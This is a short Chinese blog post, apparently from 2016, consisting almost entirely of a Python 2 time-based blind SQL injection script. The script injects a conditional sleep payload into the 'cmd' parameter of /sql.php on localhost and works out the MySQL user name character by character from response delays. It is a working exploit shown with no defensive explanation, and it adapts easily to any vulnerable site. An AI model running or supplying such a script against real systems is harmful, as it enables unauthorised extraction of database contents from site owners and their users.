SQL注入脚本(基于时间)

#encoding=utf-8
import httplib
import time
import string
import sys
import urllib
header = {'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 
                'Accept-Charset':'GB2312,utf-8;q=0.7,*;q=0.7', 
                'Accept-Language':'zh-cn,zh;q=0.5', 
                'Cache-Control':'max-age=0', 
                'Connection':'keep-alive', 
                'Keep-Alive':'115',
                'User-Agent':'Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.14) Gecko/20110221 Ubuntu/10.10 (maverick) Firefox/3.6.14'}

payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
for i in range(1, 21):
    for payload in payloads:
        try:

            s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))
            s = " and (if(%s,sleep(3),0))#" % s
            conn = httplib.HTTPConnection('127.0.0.1', timeout=3)
            conn.request(method='GET', url="/sql.php?cmd=1%s" % urllib.quote(s),headers=header)

            conn.getresponse()
            conn.close()
#            print '.',
        except Exception,e:
#            print e
            user += payload
            print '\n[surprise]:', user,
            time.sleep(3.0)
            break
print '\n[Done] MySQL user is %s' % user

 

posted on 2016-04-14 14:14  lly001  阅读(648)  评论(0编辑  收藏  举报

导航